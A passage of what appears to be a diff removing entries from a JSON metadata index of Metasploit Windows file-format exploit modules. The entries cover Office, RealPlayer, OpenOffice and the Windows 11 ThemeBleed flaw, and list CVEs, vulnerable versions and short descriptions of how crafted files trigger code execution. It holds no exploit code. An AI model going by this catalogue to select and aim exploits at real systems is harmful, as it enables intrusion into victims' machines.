- "targets": [ - "Microsoft Office" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/office_ms17_11882.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_ms17_11882", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_ole_multiple_dll_hijack": { - "name": "Office OLE Multiple DLL Side Loading Vulnerabilities", - "fullname": "exploit/windows/fileformat/office_ole_multiple_dll_hijack", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-08", - "type": "exploit", - "author": [ - "Yorick Koster" - ], - "description": "Multiple DLL side loading vulnerabilities were found in various COM components.\n These issues can be exploited by loading various these components as an embedded\n OLE object. When instantiating a vulnerable object Windows will try to load one\n or more DLLs from the current working directory. If an attacker convinces the\n victim to open a specially crafted (Office) document from a directory also\n containing the attacker's DLL file, it is possible to execute arbitrary code with\n the privileges of the target user. This can potentially result in the attacker\n taking complete control of the affected system.", - "references": [ - "CVE-2015-6132", - "CVE-2015-6128", - "CVE-2015-6133", - "CVE-2016-0041", - "CVE-2016-0100", - "CVE-2016-3235", - "MSB-MS15-132", - "MSB-MS16-014", - "MSB-MS16-025", - "MSB-MS16-041", - "MSB-MS16-070", - "URL-https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html", - "URL-https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html", - "URL-https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html", - "URL-https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "All", - "COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)", - "Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)", - "Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)", - "Shutdown UX / Windows 10 / Office 2016 (MS15-132)", - "MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)", - "Microsoft Visio 2010 / Windows 7 (MS16-070)", - "Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)", - "OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)", - "Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)", - "NPS Datastore server / Windows Vista / Office 2010 (MS16-014)", - "BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_ole_multiple_dll_hijack", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_word_hta": { - "name": "Microsoft Office Word Malicious Hta Execution", - "fullname": "exploit/windows/fileformat/office_word_hta", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-04-14", - "type": "exploit", - "author": [ - "Haifei Li", - "ryHanson", - "wdormann", - "DidierStevens", - "vysec", - "Nixawk", - "sinn3r " - ], - "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a olelink object can make a http(s) request,\n and execute hta code in response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. This module was created by reversing a public\n malware sample.", - "references": [ - "CVE-2017-0199", - "URL-https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/", - "URL-https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html", - "URL-https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/", - "URL-https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", - "URL-https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html", - "URL-https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf", - "URL-https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/", - "URL-https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100", - "URL-https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/", - "URL-https://www.microsoft.com/en-us/download/details.aspx?id=10725", - "URL-https://msdn.microsoft.com/en-us/library/dd942294.aspx", - "URL-https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Word" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/office_word_hta.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_word_hta", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/openoffice_ole": { - "name": "OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow", - "fullname": "exploit/windows/fileformat/openoffice_ole", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-04-17", - "type": "exploit", - "author": [ - "Marsu ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on\n Microsoft Windows XP SP3.\n\n By supplying a OLE file with a malformed DocumentSummaryInformation stream, an\n attacker can gain control of the execution flow, which results arbitrary code\n execution under the context of the user.", - "references": [ - "CVE-2008-0320", - "OSVDB-44472", - "BID-28819", - "EDB-5584", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/openoffice_ole", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/orbit_download_failed_bof": { - "name": "Orbit Downloader URL Unicode Conversion Overflow", - "fullname": "exploit/windows/fileformat/orbit_download_failed_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-04-03", - "type": "exploit", - "author": [ - "Diego Juarez", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in Orbit Downloader.\n The vulnerability is due to Orbit converting a URL ascii string to unicode\n in an insecure way with MultiByteToWideChar.\n The vulnerability is exploited with a specially crafted metalink file that\n should be opened with Orbit through the \"File->Add Metalink...\" option.", - "references": [ - "BID-28541", - "OSVDB-44036", - "CVE-2008-1602", - "URL-http://www.coresecurity.com/content/orbit-downloader" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Orbit Downloader 6.4 on Windows XP SP3", - "Orbit Downloader 6.4 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/orbit_download_failed_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/orbital_viewer_orb": { - "name": "Orbital Viewer ORB File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/orbital_viewer_orb", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-27", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in David Manthey's\n Orbital Viewer. When processing .ORB files, data is read from file into\n a fixed-size stack buffer using the fscanf function. Since no bounds\n checking is done, a buffer overflow can occur. Attackers can execute\n arbitrary code by convincing their victim to open an ORB file.", - "references": [ - "BID-38436", - "OSVDB-62580", - "CVE-2010-0688", - "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/", - "EDB-11581" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Orbital Viewer 1.04 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/orbital_viewer_orb.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/orbital_viewer_orb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ovf_format_string": { - "name": "VMWare OVF Tools Format String Vulnerability", - "fullname": "exploit/windows/fileformat/ovf_format_string", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-08", - "type": "exploit", - "author": [ - "Jeremy Brown", - "juan vazquez " - ], - "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", - "references": [ - "CVE-2012-3569", - "OSVDB-87117", - "BID-56468", - "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VMWare OVF Tools 2.1 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/ovf_format_string.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ovf_format_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/proshow_cellimage_bof": { - "name": "ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/proshow_cellimage_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-20", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n An attacker must send the file to victim and the victim must open the file.", - "references": [ - "CVE-2009-3214", - "OSVDB-57226", - "EDB-9483", - "EDB-9519" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/proshow_cellimage_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/proshow_load_bof": { - "name": "Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow", - "fullname": "exploit/windows/fileformat/proshow_load_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-06", - "type": "exploit", - "author": [ - "Julien Ahrens", - "mr.pr0n", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n crafted \"load\" file to victim, who must store it in the installation directory. The\n vulnerability will be triggered the next time ProShow is opened. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "OSVDB-83745", - "EDB-19563", - "EDB-20036", - "URL-http://security.inshell.net/advisory/30" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/proshow_load_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/publishit_pui": { - "name": "Publish-It PUI Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/publishit_pui", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-05", - "type": "exploit", - "author": [ - "Daniel Kazimirow", - "Andrew Smith \"jakx_\"" - ], - "description": "This module exploits a stack based buffer overflow in Publish-It when\n processing a specially crafted .PUI file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Publish-It to open a malicious .PUI file.", - "references": [ - "OSVDB-102911", - "CVE-2014-0980", - "EDB-31461" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Publish-It 3.6d" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/publishit_pui.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/publishit_pui", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/real_networks_netzip_bof": { - "name": "Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability", - "fullname": "exploit/windows/fileformat/real_networks_netzip_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-01-30", - "type": "exploit", - "author": [ - "C4SS!0 G0M3S", - "TecR0c " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 7.5.1 86 of Real Networks Netzip Classic.\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted zip file with NetZip Classic.\n By doing so, an attacker can execute arbitrary code as the victim user.", - "references": [ - "OSVDB-83436", - "EDB-16083", - "BID-46059", - "URL-http://proforma.real.com" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3", - "Windows 7/Windows Vista" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/real_networks_netzip_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/real_player_url_property_bof": { - "name": "RealPlayer RealMedia File Handling Buffer Overflow", - "fullname": "exploit/windows/fileformat/real_player_url_property_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-12-14", - "type": "exploit", - "author": [ - "suto " - ], - "description": "This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\n The vulnerability exists in the handling of real media files, due to the insecure\n usage of the GetPrivateProfileString function to retrieve the URL property from an\n InternetShortcut section.\n\n This module generates a malicious rm file which must be opened with RealPlayer via\n drag and drop or double click methods. It has been tested successfully on Windows\n XP SP3 with RealPlayer 15.0.5.109.", - "references": [ - "CVE-2012-5691", - "OSVDB-88486", - "BID-56956", - "URL-http://service.real.com/realplayer/security/12142012_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Real Player 15.0.5.109" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/real_player_url_property_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/real_player_url_property_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/realplayer_ver_attribute_bof": { - "name": "RealNetworks RealPlayer Version Attribute Buffer Overflow", - "fullname": "exploit/windows/fileformat/realplayer_ver_attribute_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-20", - "type": "exploit", - "author": [ - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by\n improper bounds checking of the version and encoding attributes inside\n the XML declaration.\n\n By persuading the victim to open a specially-crafted .RMP file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash.", - "references": [ - "BID-64695", - "EDB-30468", - "OSVDB-101356", - "CVE-2013-7260", - "US-CERT-VU-698278", - "URL-http://service.real.com/realplayer/security/12202013_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/realplayer_ver_attribute_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/safenet_softremote_groupname": { - "name": "SafeNet SoftRemote GROUPNAME Buffer Overflow", - "fullname": "exploit/windows/fileformat/safenet_softremote_groupname", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-30", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SafeNet SoftRemote\n Security Policy Editor <= 10.8.5. When an attacker\n creates a specially formatted security policy with an\n overly long GROUPNAME argument, it is possible to execute\n arbitrary code.", - "references": [ - "CVE-2009-3861", - "OSVDB-59660", - "URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 English", - "WinSrv 2000 SP4 English", - "WinSrv 2000 SP2 English", - "WinSrv 2003 Enterprise Edition SP1 (v1023) English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/safenet_softremote_groupname", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/sascam_get": { - "name": "SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow", - "fullname": "exploit/windows/fileformat/sascam_get", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-12-29", - "type": "exploit", - "author": [ - "dean " - ], - "description": "The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n By passing an overly long argument via the Get method, a remote attacker could\n overflow a buffer and execute arbitrary code on the system with the privileges\n of the user. This control is not marked safe for scripting, please choose your\n attack vector carefully.", - "references": [ - "CVE-2008-6898", - "OSVDB-55945", - "BID-33053" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/sascam_get.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/sascam_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/scadaphone_zip": { - "name": "ScadaTEC ScadaPhone Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/scadaphone_zip", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-09-12", - "type": "exploit", - "author": [ - "mr_me " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 5.3.11.1230 of scadaTEC's ScadaPhone.\n\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted project zip file with ScadaPhone.\n By doing so, an attacker can execute arbitrary code as the victim user.", - "references": [ - "CVE-2011-4535", - "OSVDB-75375", - "URL-http://www.scadatec.com/", - "EDB-17817" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/scadaphone_zip.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/scadaphone_zip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/shadow_stream_recorder_bof": { - "name": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow", - "fullname": "exploit/windows/fileformat/shadow_stream_recorder_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-29", - "type": "exploit", - "author": [ - "AlpHaNiX ", - "b0telh0 " - ], - "description": "This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\n Using the application to open a specially crafted asx file, a buffer\n overflow may occur to allow arbitrary code execution under the context\n of the user.", - "references": [ - "CVE-2009-1641", - "OSVDB-81487", - "EDB-11957", - "BID-34864" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/shadow_stream_recorder_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/shaper_pdf_bof": { - "name": "PDF Shaper Buffer Overflow", - "fullname": "exploit/windows/fileformat/shaper_pdf_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-10-03", - "type": "exploit", - "author": [ - "metacom27 ", - "metacom" - ], - "description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.", - "references": [ - "EDB-37760" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/shaper_pdf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/somplplayer_m3u": { - "name": "S.O.M.P.L 1.0 Player Buffer Overflow", - "fullname": "exploit/windows/fileformat/somplplayer_m3u", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-01-22", - "type": "exploit", - "author": [ - "Rick2600", - "dookie" - ], - "description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-64368", - "EDB-11219" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/somplplayer_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/subtitle_processor_m3u_bof": { - "name": "Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow", - "fullname": "exploit/windows/fileformat/subtitle_processor_m3u_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-26", - "type": "exploit", - "author": [ - "Brandon Murphy", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Subtitle Processor 7. By\n supplying a long string of data as a .m3u file, Subtitle Processor first converts\n this input in Unicode, which expands the string size, and then attempts to copy it\n inline on the stack. This results a buffer overflow with SEH overwritten, allowing\n arbitrary code execution.", - "references": [ - "OSVDB-72050", - "EDB-17217", - "URL-http://sourceforge.net/projects/subtitleproc/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/subtitle_processor_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/syncbreeze_xml": { - "name": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow", - "fullname": "exploit/windows/fileformat/syncbreeze_xml", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-29", - "type": "exploit", - "author": [ - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.", - "references": [ - "CVE-2017-7310", - "EDB-41773" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/syncbreeze_xml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/tfm_mmplayer_m3u_ppl_bof": { - "name": "TFM MMPlayer (m3u/ppl File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-03-23", - "type": "exploit", - "author": [ - "RjRjh Hack3r", - "bcoles " - ], - "description": "This module exploits a buffer overflow in MMPlayer 2.2\n The vulnerability is triggered when opening a malformed M3U/PPL file\n that contains an overly long string, which results in overwriting a\n SEH record, thus allowing arbitrary code execution under the context\n of the user.", - "references": [ - "CVE-2009-2566", - "OSVDB-80532", - "BID-52698", - "EDB-18656", - "EDB-18657" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/tfm_mmplayer_m3u_ppl_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/theme_dll_hijack_cve_2023_38146": { - "name": "Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146", - "fullname": "exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-09-13", - "type": "exploit", - "author": [ - "gabe_k", - "bwatters-r7", - "Spencer McIntyre" - ], - "description": "When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the\n msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll\n file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by\n opening the file for reading and verifying the signature before opening the file for execution.\n Because this action is performed in two discrete operations, it opens the procedure for a time of check to\n time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can\n serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name\n when the host intends to load/execute the dll.", - "references": [ - "CVE-2023-38146", - "URL-https://exploits.forsale/themebleed/", - "URL-https://github.com/gabe-k/themebleed/tree/main" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2024-01-04 11:11:23 +0000", - "path": "/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/theme_dll_hijack_cve_2023_38146", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "AKA": [ - "ThemeBleed" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/total_video_player_ini_bof": { - "name": "Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow", - "fullname": "exploit/windows/fileformat/total_video_player_ini_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-24", - "type": "exploit", - "author": [ - "Mike Czumak", - "Fr330wn4g3 " - ], - "description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n occurs opening malformed Settings.ini file e.g. \"C:\\Program Files\\Total Video Player\\\".\n This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.", - "references": [ - "OSVDB-100619", - "EDB-29799" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 